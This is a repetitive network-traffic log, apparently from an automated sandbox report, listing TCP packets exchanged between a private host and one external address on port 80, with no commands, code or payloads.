                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
